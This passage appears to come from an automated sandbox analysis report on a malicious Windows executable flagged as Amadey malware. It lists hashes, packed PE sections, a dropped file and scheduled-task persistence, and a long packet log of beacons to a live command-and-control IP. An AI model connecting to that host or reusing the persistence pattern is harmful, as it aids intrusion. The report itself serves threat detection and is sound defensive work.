                  SSDEEP:49152:XMz4/uhkyElzZRXsGajUuG5iH0TY/2g9r7:cz4o7ElzLBNGoYr7
                  MD5:2EC94ACBF5439B6B76B4A04D1D779397
                  SHA1:D43E4758F63E3C425C4EBED21D9393424F18206A
                  SHA-256:1232B1AEE31F39DB334E9233E7658F5DFDC588F3F698E619C3A0C9B3484C1629
                  SHA-512:2983A6EB702BEF684DF84B41C8DA43B111AF7318EC3515145FE36C542B07CCB9D7AAA59B107282060E9C420D90915E897F9EF2C3B95B793830118C49DBD90BD6
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@...........................L...........@.................................W...k............................pL.............................lpL..................................................... . ............................@....rsrc...............................@....idata ............................@... .P+.........................@...hsrzezej......2..t..................@...vqlpxtuc......L......h..............@....taggant.0....L.."...l..............@...........................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Windows\Tasks\axplong.job

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):292
                  Entropy (8bit):3.411510951129594
                  Encrypted:false
                  SSDEEP:6:wtmLX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0lbKt0:wcDQ1lOmeeDNfXVGt0
                  MD5:06BC05A9889F0CD189C7C33F58C68C23
                  SHA1:05B0005468CEC13157BB547B66D5770187F505F4
                  SHA-256:F18507994CC8F989CD26FD117ED5B167355D0BB5479581B31891E7CC01C89A27
                  SHA-512:F5BC9B5790C20F389677405C1B2A8BECBFBC4B6C02FD0835FD344736406A1B10B10646F980D1C540CE2370B32516B5B497465D6A854D87FBC7857176295B8B53
                  Malicious:false
                  Reputation:low
                  Preview:....X..F. HB.Jg.3.l~F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................4.@3P.........................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.949909040231611
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'936'896 bytes
                  MD5:2ec94acbf5439b6b76b4a04d1d779397
                  SHA1:d43e4758f63e3c425c4ebed21d9393424f18206a
                  SHA256:1232b1aee31f39db334e9233e7658f5dfdc588f3f698e619c3a0c9b3484c1629
                  SHA512:2983a6eb702bef684df84b41c8da43b111af7318ec3515145fe36c542b07ccb9d7aaa59b107282060e9c420d90915e897f9ef2c3b95b793830118c49dbd90bd6
                  SSDEEP:49152:XMz4/uhkyElzZRXsGajUuG5iH0TY/2g9r7:cz4o7ElzLBNGoYr7
                  TLSH:5995332B4613DBF8C89D48FC914A43A17B39B0F6497A9BB70023866D50CBEE950DDDB4
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                  File Icon

                  Icon Hash:00928e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x8c9000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                  Entrypoint Preview

                  Instruction
                  jmp 00007F05ECCDBA5Ah

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c70bc0x10hsrzezej
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x4c706c0x18hsrzezej
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x680000x2de00b4650c512422daea9d14e9901f35a4ffFalse0.9970516859673024data7.980121831672435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x690000x1e00x200e677fd0fb795480800d6e2898af5fc0dFalse0.576171875data4.500339729324091IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x6b0000x2b50000x20031d776fb8608bfb2d2f991b3834b8fc4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  hsrzezej0x3200000x1a80000x1a7400a821afb71a2607cef17a7cd111fdc769False0.9945219054562906data7.9531207012657585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  vqlpxtuc0x4c80000x10000x400dee3ca8b85f32d0be740925325448ebcFalse0.7880859375data6.1047755318017245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x4c90000x30000x2200b9d9729759c13b9cad16d820175af6abFalse0.06801470588235294DOS executable (COM)0.7787720701321621IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_MANIFEST0x4c70cc0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                  Imports

                  DLLImport
                  kernel32.dlllstrcpy

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-26T19:52:17.634115+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.549724185.215.113.1680TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 26, 2024 19:52:03.637351990 CEST4971280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:03.644102097 CEST8049712185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:03.644201994 CEST4971280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:03.644375086 CEST4971280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:03.649231911 CEST8049712185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:04.364855051 CEST8049712185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:04.364999056 CEST4971280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:04.367322922 CEST4971280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:04.372240067 CEST8049712185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:04.599431992 CEST8049712185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:04.599550962 CEST4971280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:04.709199905 CEST4971280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:04.709520102 CEST4971380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:04.714380980 CEST8049713185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:04.714523077 CEST4971380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:04.714541912 CEST8049712185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:04.714596987 CEST4971280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:04.714777946 CEST4971380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:04.719619989 CEST8049713185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:05.430788040 CEST8049713185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:05.430880070 CEST4971380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:05.431557894 CEST4971380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:05.436376095 CEST8049713185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:05.664062977 CEST8049713185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:05.665544987 CEST4971380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:05.772034883 CEST4971380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:05.772356987 CEST4971480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:05.777188063 CEST8049714185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:05.777267933 CEST4971480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:05.777297020 CEST8049713185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:05.777345896 CEST4971380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:05.777435064 CEST4971480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:05.782207012 CEST8049714185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:06.488980055 CEST8049714185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:06.489243984 CEST4971480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:06.490010977 CEST4971480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:06.494848013 CEST8049714185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:06.747865915 CEST8049714185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:06.748008013 CEST4971480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:06.850047112 CEST4971480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:06.850389004 CEST4971580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:06.855252028 CEST8049715185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:06.855323076 CEST4971580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:06.855482101 CEST8049714185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:06.855494022 CEST4971580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:06.855542898 CEST4971480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:06.860304117 CEST8049715185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:07.586081982 CEST8049715185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:07.586169958 CEST4971580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:07.586807013 CEST4971580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:07.591617107 CEST8049715185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:07.814698935 CEST8049715185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:07.815670013 CEST4971580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:07.928064108 CEST4971580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:07.928466082 CEST4971680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:07.933161020 CEST8049715185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:07.933315039 CEST4971580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:07.933521032 CEST8049716185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:07.937500000 CEST4971680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:07.937638998 CEST4971680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:07.942568064 CEST8049716185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:08.689390898 CEST8049716185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:08.692306042 CEST4971680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:08.704065084 CEST4971680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:08.709104061 CEST8049716185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:08.930530071 CEST8049716185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:08.930609941 CEST4971680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:09.037682056 CEST4971680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:09.038028955 CEST4971780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:09.042943954 CEST8049717185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:09.043062925 CEST4971780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:09.043122053 CEST8049716185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:09.043180943 CEST4971680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:09.047137022 CEST4971780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:09.052062988 CEST8049717185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:09.737123013 CEST8049717185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:09.737313986 CEST4971780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:09.737988949 CEST4971780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:09.743014097 CEST8049717185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:09.961215019 CEST8049717185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:09.961355925 CEST4971780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:10.079129934 CEST4971780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:10.079474926 CEST4971880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:10.084431887 CEST8049718185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:10.084522963 CEST4971880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:10.084666014 CEST4971880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:10.084830046 CEST8049717185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:10.084891081 CEST4971780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:10.089426994 CEST8049718185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:10.794328928 CEST8049718185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:10.794400930 CEST4971880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:10.798983097 CEST4971880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:10.803807974 CEST8049718185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:11.048597097 CEST8049718185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:11.048680067 CEST4971880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:11.162525892 CEST4971880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:11.162731886 CEST4971980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:11.167829037 CEST8049718185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:11.167891026 CEST8049719185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:11.167923927 CEST4971880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:11.167978048 CEST4971980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:11.168142080 CEST4971980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:11.172952890 CEST8049719185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:12.012074947 CEST8049719185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:12.012382030 CEST4971980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:12.013063908 CEST4971980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:12.017869949 CEST8049719185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:12.236385107 CEST8049719185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:12.236500978 CEST4971980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:12.352252007 CEST4971980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:12.352535009 CEST4972080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:12.357381105 CEST8049719185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:12.357393980 CEST8049720185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:12.357475996 CEST4971980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:12.357511997 CEST4972080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:12.357697010 CEST4972080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:12.362468958 CEST8049720185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:13.058492899 CEST8049720185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:13.058619022 CEST4972080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:13.059215069 CEST4972080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:13.064040899 CEST8049720185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:13.304394960 CEST8049720185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:13.304445982 CEST4972080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:13.412333965 CEST4972080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:13.412688017 CEST4972180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:13.417462111 CEST8049720185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:13.417557955 CEST4972080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:13.417594910 CEST8049721185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:13.417725086 CEST4972180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:13.417876005 CEST4972180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:13.422662020 CEST8049721185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:14.153135061 CEST8049721185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:14.153238058 CEST4972180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:14.153961897 CEST4972180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:14.158803940 CEST8049721185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:14.382499933 CEST8049721185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:14.382656097 CEST4972180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:14.492754936 CEST4972180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:14.493170023 CEST4972280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:14.497910023 CEST8049721185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:14.497931957 CEST8049722185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:14.497989893 CEST4972180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:14.498039007 CEST4972280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:14.498296976 CEST4972280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:14.503093004 CEST8049722185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:15.349714994 CEST8049722185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:15.349920988 CEST4972280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:15.350593090 CEST4972280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:15.355391026 CEST8049722185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:15.579698086 CEST8049722185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:15.579802036 CEST4972280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:15.694086075 CEST4972280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:15.694376945 CEST4972380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:15.700490952 CEST8049722185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:15.700505972 CEST8049723185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:15.700562954 CEST4972280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:15.700598001 CEST4972380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:15.700742960 CEST4972380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:15.705506086 CEST8049723185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:16.506740093 CEST8049723185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:16.506927013 CEST4972380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:16.507663965 CEST4972380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:16.514705896 CEST8049723185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:16.778635979 CEST8049723185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:16.778708935 CEST4972380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:16.881124973 CEST4972380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:16.881477118 CEST4972480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:16.886465073 CEST8049724185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:16.886553049 CEST4972480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:16.886677980 CEST4972480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:16.891598940 CEST8049724185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:16.903479099 CEST8049723185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:16.903574944 CEST4972380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:17.633979082 CEST8049724185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:17.634114981 CEST4972480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:17.640093088 CEST4972480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:17.648792982 CEST8049724185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:17.883949995 CEST8049724185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:17.884022951 CEST4972480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:17.990576982 CEST4972480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:17.990880013 CEST4972580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:17.996444941 CEST8049725185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:17.996541023 CEST4972580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:17.996603966 CEST8049724185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:17.996658087 CEST4972480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:17.996773958 CEST4972580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:18.003027916 CEST8049725185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:18.713627100 CEST8049725185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:18.713717937 CEST4972580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:18.714381933 CEST4972580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:18.719232082 CEST8049725185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:18.977169037 CEST8049725185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:18.977287054 CEST4972580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:19.084567070 CEST4972580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:19.084896088 CEST4972680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:19.091103077 CEST8049726185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:19.091171980 CEST4972680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:19.091200113 CEST8049725185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:19.091245890 CEST4972580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:19.091345072 CEST4972680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:19.097528934 CEST8049726185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:19.815109015 CEST8049726185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:19.815191984 CEST4972680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:19.816308022 CEST4972680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:19.822319984 CEST8049726185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:20.039165974 CEST8049726185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:20.039227009 CEST4972680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:20.146691084 CEST4972680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:20.147069931 CEST4972780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:20.152220964 CEST8049726185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:20.152318954 CEST4972680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:20.152868032 CEST8049727185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:20.152956963 CEST4972780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:20.153104067 CEST4972780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:20.158459902 CEST8049727185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:20.855324984 CEST8049727185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:20.855609894 CEST4972780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:20.856623888 CEST4972780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:20.862004995 CEST8049727185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:21.084162951 CEST8049727185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:21.084265947 CEST4972780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:21.196223021 CEST4972780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:21.196650028 CEST4972880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:21.201680899 CEST8049728185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:21.201900005 CEST8049727185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:21.201948881 CEST4972880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:21.202035904 CEST4972780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:21.202054024 CEST4972880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:21.207561016 CEST8049728185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:21.909286976 CEST8049728185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:21.909379959 CEST4972880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:21.910269022 CEST4972880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:21.915046930 CEST8049728185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:22.138643026 CEST8049728185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:22.138806105 CEST4972880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:22.336819887 CEST4972880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:22.341372013 CEST4972980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:22.342029095 CEST8049728185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:22.342073917 CEST4972880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:22.346205950 CEST8049729185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:22.346267939 CEST4972980192.168.2.5185.215.113.16
